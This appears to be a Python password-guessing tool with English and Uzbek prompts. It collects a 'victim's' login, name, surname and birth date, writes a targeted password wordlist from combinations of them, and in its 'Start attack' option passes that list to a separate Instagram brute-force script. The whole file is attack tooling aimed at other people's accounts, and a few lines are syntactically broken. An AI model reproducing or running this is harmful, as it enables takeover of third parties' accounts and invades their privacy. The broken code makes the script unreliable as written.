import os
import subprocess

from colorama import Fore, Back, Style

def cls():
    os.system('cls' if os.name=='nt' else 'clear')


cls()
print(Fore.GREEN + "")
             
print("    _       _  _ __  ")
print("  / _  | / _ \| '_ \ ")
print("  \__, | \___||_| |_| ")
print("  |___/ ")
print("  ")
print("         _ _   ___   ___ ")
print(" ( '_\  /'_ )/',__)/',__) ")
print(" | (_) )( (_| |\__, \\__, \ ")
print(" | ,__/'\__,_)(____/(____/ ")
print(" | / ")
print(" (_) ")
print(Fore.CYAN + " by @Uzbekmind_public | @UMChats (telegram)")
print("-------------------------------------------------")
print(" ")
print(Fore.YELLOW +  " [1] Save in file | Faylga saqlash")
print(Fore.WHITE + "")
print(" [2] Show in program | Dasturda ko'rstish")
print(Fore.RED + "")
print(" [3] Delete old file (of 1 item) | Eski lug'atni yo'q qilish (1 bo'limga ga tegishli)")
print(Fore.MAGENTA + " ")
print(" [4] Start attack | Brut qilishni boshlash (shaxsiy lug'atingizni joylashingiz kerak)")
print(Fore.GREEN + "")
nachat = input(" Write parametr | Bo'limni tanlang : ")

if nachat == "4":
    cls()
    print(Fore.GREEN + "")

    print("    _       _  _ __  ")
    print("  / _  | / _ \| '_ \ ")
    print("  \__, | \___||_| |_| ")
    print("  |___/ ")
    print("  ")
    print("         _ _   ___   ___ ")
    print(" ( '_\  /'_ )/',__)/',__) ")
    print(" | (_) )( (_| |\__, \\__, \ ")
    print(" | ,__/'\__,_)(____/(____/ ")
    print(" | / ")
    print(" (_) ")
    zeta = input("Username of victim | Jabrlanuvchi usernamesi: ")
    print(Fore.CYAN + " by @Uzbekmind_public| @UMChats "  
    list_files = subprocess.run(["python", "uzinstagram.py", zeta, "pass.txt"])
    print("File uzinstagram.py not found | fayl instagram.py topilmadi") % list_files.returncode
                                
if nachat == "1":
    cls()
    print("    _   _  _ __  ")
    print("  / _ | / _ \| '_ \ ")
    print(" | (_| ||  __/| | | | ")
    print("  \__, | \___||_| |_| ")
    print("  |___/ ")
    print("  ")
    print("  _ _      _ _   ___   ___ ")
    print(" ( '_\  /'_ )/',__)/',__) ")
    print(" | (_) )( (_| |\__, \\__, \ ")
    print(" | ,__/'\__,_)(____/(____/ ")
    print(" | / ")
    print(" (_) ")
    print(" ")
    print(Fore.CYAN + "")
    print(" by @Uzbekmind_public | @UMChats (telegram)")
    print("-------------------------------------------------")
    print(Fore.RED + "AGAR LOGININGIZ YO'Q BO'LSA, 0 DEB YOZING | if you haven't a  login type 0")
    print("-------------------------------------------------")
    b = input(Fore.MAGENTA + "Login/email/number of victim | Login/email/Jabrlanuvchi telefon raqami: ")
    nam = input("Name of victim | Jabrlanuvchi ismi: ")
    nam1 = input("Lastname | Familiyasi: ")
    ag = input("Birthyear | Tug'ilgan yil: ")
    dat = input("Number of birthmouth | Tug'ilgan oy: ")
    dat1 = input("Number of birthday | Tug'ilgan kun: ")
    if b == "0":
        cls()
        file = open("pass.txt", "w")
        file.write(nam + ag + '\n')
        file.write(nam1 + ag + '\n')
        file.write(ag + nam + '\n')
        file.write(ag + nam1 + '\n')
        file.write(nam + nam1 + '\n')
        file.write(nam1 + nam + '\n')
        file.write(dat + nam + '\n')
        file.write(dat + nam1 + '\n')
        file.write(dat + ag + '\n')
        file.write(dat1 + ag + '\n')
        file.write(dat + dat1 + ag + '\n')
        file.write(ag + dat + dat1 + nam + '\n')
        file.write(ag + dat + dat1 + nam1 + '\n')
        file.write(ag + dat1 + dat + nam + '\n') 
        file.write(ag + dat1 + dat + nam1 + '\n')
        file.write(nam + dat1 + dat + '\n')
        file.write(nam1 + dat1 + dat + '\n')
        file.write(nam + dat + dat1 + '\n')
        file.write(nam1 + dat + dat1 + '\n')
        file.write(ag + dat1 + dat + '\n')
        file.write(ag + dat + dat1 + '\n')
        file.write(ag + dat1 + dat + '\n')
        file.write(dat1 + dat + ag + '\n')
        file.write(dat + ag + dat1+ '\n')
        file.write(ag + ag + '\n')
        file.write(nam + nam + '\n')
        file.write(nam1 + nam1 + '\n')
        file.close()
        print("File 'pass.txt' has been created | fayl 'pass.txt' yaratildi")

    else:

        cls()
        file = open("pass.txt", "w")
        file.write(b + ":" + nam + ag + '\n')
        file.write(b + ":" + nam1 + ag + '\n')
        file.write(b + ":" + ag + nam + '\n')
        file.write(b + ":" + ag + nam1 + '\n')
        file.write(b + ":" + nam + nam1 + '\n')
        file.write(b + ":" + nam1 + nam + '\n')
        file.write(b + ":" + dat + nam + '\n')
        file.write(b + ":" + dat + nam1 + '\n')
        file.write(b + ":" + dat + ag + '\n')
        file.write(b + ":" + dat1 + ag + '\n')
        file.write(b + ":" + dat + dat1 + ag + '\n')
        file.write(b + ":" + ag + dat + dat1 + nam + '\n')
        file.write(b + ":" + ag + dat + dat1 + nam1 + '\n')
        file.write(b + ":" + ag + dat1 + dat + nam + '\n')
        file.write(b + ":" + ag + dat1 + dat + nam1 + '\n')
        file.write(b + ":" + nam + dat1 + dat + '\n')
        file.write(b + ":" + nam1 + dat1 + dat + '\n')
        file.write(b + ":" + nam + dat + dat1 + '\n')
        file.write(b + ":" + nam1 + dat + dat1 + '\n')
        file.write(b + ":" + ag + dat1 + dat + '\n')
        file.write(b + ":" + ag + dat + dat1 + '\n')
        file.write(b + ":" + ag + dat1 + dat + '\n')
        file.write(b + ":" + dat1 + dat + ag + '\n')
        file.write(b + ":" + dat + ag + dat1+ '\n')
        file.write(b + ":" + ag + ag + '\n')
        file.write(b + ":" + nam + nam + '\n')
        file.write(b + ":" + nam1 + nam1 + '\n')
        file.close()
        print("File 'pass.txt' has been created | fayl 'pass.txt' yaratildi")

if nachat == "2":
    cls()
    print(Fore.GREEN + "")
    print("    _   _  _ __  ")
    print("  / _ | / _ \| '_ \ ")
    print(" | (_| ||  __/| | | | ")
    print("  \__, | \___||_| |_| ")
    print("  |___/ ")
    print("  ")
    print("  _ _      _ _   ___   ___ ")
    print(" ( '_\  /'_ )/',__)/',__) ")
    print(" | (_) )( (_| |\__, \\__, \ ")
    print(" | ,__/'\__,_)(____/(____/ ")
    print(" | / ")
    print(" (_) ")
    print(" ")
    print(Fore.CYAN + " by @Uzbekmind_public | @UMChats (telegram)")
    print("-------------------------------------------------")
    print(Fore.RED + "")
    print("Agar qandaydir ma'lumot yo'q bo'lsa 0 ni bosing")
    print(" ")
    print("Eng ko'pida faqat bitta 0 bo'lishi shart")
    print("-------------------------------------------------")
    print(Fore.BLUE + "")
    a = input("Login/email/number of victim | Login/email/Jabrlanuvchi telefon raqami: ")
    name = input("Name of victim | Jabrlanuvchi ismi: ")
    name1 = input("Lastname | Familiyasi: ")
    age = input("Bithyear | Tug'ilgan yil: ")
    data = input("Number of birthmouth | Tug'ilgan oy: ")
    data1 = input("Number of birthday | Tug'ilgan kun: ")

    cls()
    print(Fore.GREEN + "    _   _  _ __  ")
    print("  / _ | / _ \| '_ \ ")
    print(" | (_| ||  __/| | | | ")
    print("  \__, | \___||_| |_| ")
    print("  |___/ ")
    print("  ")
    print("  _ _      _ _   ___   ___ ")
    print(" ( '_\  /'_ )/',__)/',__) ")
    print(" | (_) )( (_| |\__, \\__, \ ")
    print(" | ,__/'\__,_)(____/(____/ ")
    print(" | / ")
    print(" (_) ")
    print(" ")
    print(Fore.CYAN + "by @Uzbekmind_public | @UMChats (telegram)")
    print("-------------------------------------------------")
    print(Fore.WHITE + "")
    if name == "0":
        print(a + ":" + name1 + age)
        print(a + ":" +age + name1)
        print(a + ":" +data + name1)
        print(a + ":" + data + age)
        print(a + ":" + data1 + age)
        print(a + ":" +data + data1 + age)
        print(a + ":" +age + data + data1 + name1)
        print(a + ":" + age + data1 + data + name1)
        print(a + ":" + name1 + data1 + data)
        print(a + ":" + name1 + data + data1)
        print(a + ":" + age + data1 + data)
        print(a + ":" + age + data + data1)
        print(a + ":" + age + data1 + data)
        print(a + ":" + data1 + data + age)
        print(a + ":" + data + age + data1)
        print(a + ":" + age + age)
        print(a + ":" + name1 + name1)
        print(a + ":" + name + name)
        what1 = input()
    elif name1 == "0":
        print(a + ":" + name + age)
        print(a + ":" + age + name)
        print(a + ":" + data + name)
        print(a + ":" + data + age)
        print(a + ":" + data1 + age)
        print(a + ":" + data + data1 + age)
        print(a + ":" + age + data1 + data + name)
        print(a + ":" + name + data1 + data)
        print(a + ":" + name + data + data1)
        print(a + ":" + age + data1 + data)
        print(a + ":" + age + data + data1)
        print(a + ":" + data1 + data + age)
        print(a + ":" + data + age + data1)
        print(a + ":" + age + age)
        print(a + ":" + name + name)
        what2 = input()
    elif age == "0":
        print(a + ":" + name + name1)
        print(a + ":" + name1 + name)
        print(a + ":" + data + name)
        print(a + ":" + data + name1)
        print(a + ":" + name + data1 + data)
        print(a + ":" + name1 + data1 + data)
        print(a + ":" + name + data + data1)
        print(a + ":" + name1 + data + data1)
        print(a + ":" + name + name)
        print(a + ":" + name1 + name1)
        what3 = input()
    elif data == "0":
        print(a + ":" + name + age)
        print(a + ":" + name1 + age)
        print(a + ":" + age + name)
        print(a + ":" + age + name1)
        print(a + ":" + name + name1)
        print(a + ":" + name1 + name)
        print(a + ":" + data1 + age)
        print(a + ":" + age + age)
        print(a + ":" + name + name)
        print(a + ":" + name1 + name1)
        what = input()
    else:
        print(name + age)
        print(name1 + age)
        print(age + name)
        print(age + name1)
        print(name + name1)
        print(name1 + name)
        print(data + name)
        print(data + name1)
        print(data + age)
        print(data1 + age)
        print(data + data1 + age)
        print(age + data + data1 + name)
        print(age + data + data1 + name1)
        print(age + data1 + data + name)
        print(age + data1 + data + name1)
        print(name + data1 + data)
        print(name1 + data1 + data)
        print(name + data + data1)
        print(name1 + data + data1)
        print(age + data1 + data)
        print(age + data + data1)
        print(age + data1 + data)
        print(data1 + data + age)
        print(data + age + data1)
        print(age + age)
        print(name + name)
        print(name1 + name1)
        lol = input()
if nachat == "3":
    myfile="pass.txt"

    if os.path.isfile(myfile):
        os.remove(myfile)
        print("")
        print("")
        print(Fore.MAGENTA + "Old dictionary was deleted | Eski lug'at o'chirildi")

    else:
        print("Error: file not found" , myfile , " | Xato: Fayl topilmadi,yoki avval yo'q qilingan")

else:
    print(Fore.RED + "Finish program | Dastur tugatildi")

